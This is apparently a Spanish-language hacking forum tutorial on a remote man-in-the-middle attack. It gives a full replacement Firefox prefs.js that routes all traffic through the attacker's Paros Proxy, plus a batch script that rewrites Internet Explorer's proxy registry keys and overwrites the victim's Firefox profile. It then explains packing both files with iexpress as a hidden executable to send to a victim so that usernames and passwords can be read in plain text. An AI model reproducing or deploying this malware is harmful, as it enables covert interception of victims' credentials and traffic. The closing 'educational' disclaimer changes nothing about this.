Ataque Man in the Middle Remotamente
Bueno en este tutorial voy a explicar una forma muy facil de realizar un ataque MIM de forma Remota
me decidi a postearlo porq no he leido en ningun foro como realizar esta facil operacion
Necesitaremos 2 cosas
1) Proxy Paros en su ultima version
2) Algun Lenguaje de Programacion
(para hacerlo de forma rapida decidi hacerlo bajo batch aunq se puede desarrollar en otro lenguaje)
Primero q nada Abrimos algun Puerto en Nuetro Modem yo elegi uno alto por ej 9669
Instalamos Proxy Paros, y nos vamos al apartado Tools/Options/Local Proxy
en Adress colocamos el ip de nuestra pc que brindara el servicio de proxy
y en Port el puerto donde correra el Servicio, en este caso 9669
Una ves configurado Paros Proxy nos vamos a programar nuestro malware
Para Lograr editar el proxy atraves de un batch en Firefox, debemos entender q la configuracion de proxys en Firefox se guarda en el archivo prefs.js
Ubicado en C:\Documents and Settings\"USUARIO"\Datos de programa\Mozilla\Firefox\Profiles\0sx27c3l.default\
0sx27c3l.default es un directorio que variara dependiendo de la version y la pc donde se instale Firefox
Sabiendo esto nos toca Crear un prefs.js q contenga la configuracion de Proxy con la IP Publica y puerto de la pc q corre Paros Proxy
Aca el Source del mismo:
# Mozilla User Preferences
/* Do not edit this file.
*
* If you make changes to this file while the application is running,
* the changes will be overwritten when the application exits.
*
* To make a manual change to preferences, you can visit the URL about:config
* For more information, see http://www.mozilla.org/unix/customizing.html#prefs
*/
user_pref("app.update.lastUpdateTime.addon-background-update-timer", 1325582074);
user_pref("app.update.lastUpdateTime.background-update-timer", 1325582074);
user_pref("app.update.lastUpdateTime.blocklist-background-update-timer", 1325582074);
user_pref("app.update.lastUpdateTime.microsummary-generator-update-timer", 1325582074);
user_pref("app.update.lastUpdateTime.search-engine-update-timer", 1325582074);
user_pref("browser.download.manager.alertOnEXEOpen", true);
user_pref("browser.migration.version", 1);
user_pref("browser.places.importDefaults", false);
user_pref("browser.places.migratePostDataAnnotations", false);
user_pref("browser.places.smartBookmarksVersion", 1);
user_pref("browser.places.updateRecentTagsUri", false);
user_pref("browser.preferences.advanced.selectedTabIndex", 1);
user_pref("browser.rights.3.shown", true);
user_pref("browser.search.defaultenginename", "SweetIM Search");
user_pref("browser.search.defaulturl", "");
user_pref("browser.search.selectedEngine", "SweetIM Search");
user_pref("browser.startup.homepage", "http://home.sweetim.com");
user_pref("browser.startup.homepage_override.mstone", "rv:1.9.0.5");
user_pref("extensions.enabledItems", "{e001c731-5e37-4538-a5cb-8168736a2360}:0.9.9.114,ffxtlbr@Facemoods.com:1.4.1,{20a82645-c095-46ed-80e3-08825760534b}:1.0,{EEE6C361-6118-11DC-9C72-001320C79847}:1.2.0.2,{972ce4c6-7e08-4474-a285-3208198ce6fd}:3.0.5");
user_pref("extensions.facemoods.DNSErrUrl", "http://start.facemoods.com/?a=nv1&f=5");
user_pref("extensions.facemoods.aflt", "_#nv1");
user_pref("extensions.facemoods.dfltSrch", false);
user_pref("extensions.facemoods.dnsErr", false);
user_pref("extensions.facemoods.fcmdVrsn", "1.2.7.5.4");
user_pref("extensions.facemoods.firstRun", false);
user_pref("extensions.facemoods.first_time", false);
user_pref("extensions.facemoods.hmpg", false);
user_pref("extensions.facemoods.hmpgUrl", "http://start.facemoods.com/?a=nv1");
user_pref("extensions.facemoods.id", "_#142e8e7b0000000000000800276b6377");
user_pref("extensions.facemoods.instlDay", "_#15321");
user_pref("extensions.facemoods.mntz", "");
user_pref("extensions.facemoods.newTab", false);
user_pref("extensions.facemoods.prtnrId", "_#facemoods.com");
user_pref("extensions.facemoods.searchProviderAdded", false);
user_pref("extensions.facemoods.sid", "_#408714f6355a4f9b85e1b2f01e44ea3e");
user_pref("extensions.facemoods.tlbrSrchUrl", "http://start.facemoods.com/?a=nv1&f=3");
user_pref("extensions.facemoods.update", "_#v1.4.0");
user_pref("extensions.facemoods.vrsn", "_#1.4.17.11");
user_pref("extensions.update.notifyUser", false);
user_pref("general.useragent.extra.microsoftdotnet", "(.NET CLR 3.5.30729)");
user_pref("intl.charsetmenu.browser.cache", "UTF-8");
user_pref("keyword.URL", "http://search.sweetim.com/search.asp?src=2&q=");
user_pref("network.cookie.prefsMigrated", true);
user_pref("network.proxy.backup.ftp", "192.168.0.2");
user_pref("network.proxy.backup.ftp_port", 9669);
user_pref("network.proxy.backup.gopher", "192.168.0.2");
user_pref("network.proxy.backup.gopher_port", 9669);
user_pref("network.proxy.backup.socks", "192.168.0.2");
user_pref("network.proxy.backup.socks_port", 9669);
user_pref("network.proxy.backup.ssl", "192.168.0.2");
user_pref("network.proxy.backup.ssl_port", 9669);
user_pref("network.proxy.ftp", "IPPUBLICA");
user_pref("network.proxy.ftp_port", PUERTO PAROS);
user_pref("network.proxy.gopher", "IPPUBLICA");
user_pref("network.proxy.gopher_port", PUERTO PAROS);
user_pref("network.proxy.http", "IPPUBLICA");
user_pref("network.proxy.http_port", PUERTO PAROS);
user_pref("network.proxy.share_proxy_settings", true);
user_pref("network.proxy.socks", "IPPUBLICA");
user_pref("network.proxy.socks_port", PUERTO PAROS);
user_pref("network.proxy.ssl", "IPPUBLICA");
user_pref("network.proxy.ssl_port", PUERTO PAROS);
user_pref("network.proxy.type", 1);
user_pref("privacy.clearOnShutdown.cookies", false);
user_pref("security.warn_viewing_mixed", false);
user_pref("security.warn_viewing_mixed.show_once", false);
user_pref("sweetim.toolbar.highlight.colors", "#FFFF00,#00FFE4,#5AFF00,#0087FF,#FFCC00,#FF00F0");
user_pref("sweetim.toolbar.logger.ConsoleHandler.MinReportLevel", "7");
user_pref("sweetim.toolbar.logger.FileHandler.FileName", "ff-toolbar.log");
user_pref("sweetim.toolbar.logger.FileHandler.MaxFileSize", "200000");
user_pref("sweetim.toolbar.logger.FileHandler.MinReportLevel", "7");
user_pref("sweetim.toolbar.mode.debug", "false");
user_pref("sweetim.toolbar.previous.browser.search.defaultenginename", "");
user_pref("sweetim.toolbar.previous.browser.search.defaulturl", "");
user_pref("sweetim.toolbar.previous.browser.search.selectedEngine", "");
user_pref("sweetim.toolbar.previous.browser.startup.homepage", "");
user_pref("sweetim.toolbar.previous.keyword.URL", "chrome://browser-region/locale/region.properties");
user_pref("sweetim.toolbar.search.external", "");
user_pref("sweetim.toolbar.search.history.capacity", "10");
user_pref("sweetim.toolbar.searchguard.enable", "true");
user_pref("sweetim.toolbar.simapp_id", "{D1E38357-2567-11E1-A738-0800276B6377}");
user_pref("sweetim.toolbar.urls.homepage", "http://home.sweetim.com");
user_pref("sweetim.toolbar.version", "1.2.0.2");
user_pref("urlclassifier.keyupdatetime.https://sb-ssl.google.com/safebrowsing/newkey", 1342938776);
user_pref("xpinstall.whitelist.add", "");
user_pref("xpinstall.whitelist.add.103", "");
Deben Editar donde dice IPPUBLICA con la Ip del Servidor Paros y donde dice PUERTO PAROS con el Puerto Correspondiente
una ves Creado nuestro prefs.js (desde ahora lo llamaremos prefsh.js) nos vamos a programar nuestro Malware.
Abrimos el Notepad y pegamos lo siguiente (el siguiente Source cambia el Proxy en los Registros de IE)
(Tienen q Sustituir por el Ip del Servidor Proxy Paros donde dice MIIPPUBLICA (ip publica de su pc donde se corre Paros) y donde dice Puerto por el correspondiente Puerto)
@echo off
reg add “HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings” /v ProxyServer /t REG_SZ /d ftp=MIIPPUBLICA:Puerto;http=MIIPPUBLICA:Puerto;https=MIIPPUBLICA:Puerto;socks=MIIPPUBLICA:Puerto /f
reg add “HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings” /v ProxyEnable /t REG_DWORD /d 0 /f
copy prefsh.js c:\prefsh.js
REM aca sustituimos el prefs.js por nuestro prefsh.js
cd %APPDATA%\Mozilla\Firefox\Profiles\0sx27c3l.default
delete prefs.js
copy c:\prefsh.js %APPDATA%\Mozilla\Firefox\Profiles\prefs.js
exit
Aca tengo una falencia q seguro algun lector va a poder aclararme, dado q 0sx27c3l.default es una carpeta creada al momento de instalacion
como podria lograr a traves de batch encontrar el nombre de esa carpeta para luego moverme dentro de ella porq de otra manera el source anterior no funcionaria
en todas las pcs victimas
Pense en moverme primero a %APPDATA%\Mozilla\Firefox\Profiles luego buscar el archivo, con Dir prefs.js /s esto devolveria la hubicacion completa del mismo
y por lo tanto el nombre de esta carpeta default, ahora como puedo utilizar esta ruta o solo sacar el nombre de la carpeta y moverme dentro de ella para lograr
sustituir con exito prefs.js por prefsh.js?
Al finalizar esta parte, tendremos 2 archivos, prefsh.js y el batch y recurriremos a nuestro antiguo amigo iexpress
Crearemos un paquete de ejecucion oculta, meteremos ambos archivos y estableceremos el .bat para la ejecucion post descompresion
Hecho esto tendremos 1 archivo q deberemos mandarcelo a nuesta victima, al ejecutarlo toda informacion q viaje a travez de internet
sera redireccionada a nuestro Proxy y podremos verla en texto sin sifrar.
Como veran en la siguiente fotografia el usuario y password introducidos por la PCVictima se ven reflejados en Paros Proxy en texto Plano
Renuncia: Este contenido es Puramente Educativo, y no me responzabiliso del uso Inadecuado del mismo
No recomiendo para nada esta tecnica, ya q canta muchisimo, al cerrar Proxy Paros se caera la coneccion de la PCVictima y tambien saldran Carteles en los navegadores por falta de certificados, es algo arcaico existiendo los troyanos de hoy en dia, pero es una forma de enteder el sniffing a nivel remoto y una forma distinta a lo comun de lograrlo.
HD_Breaker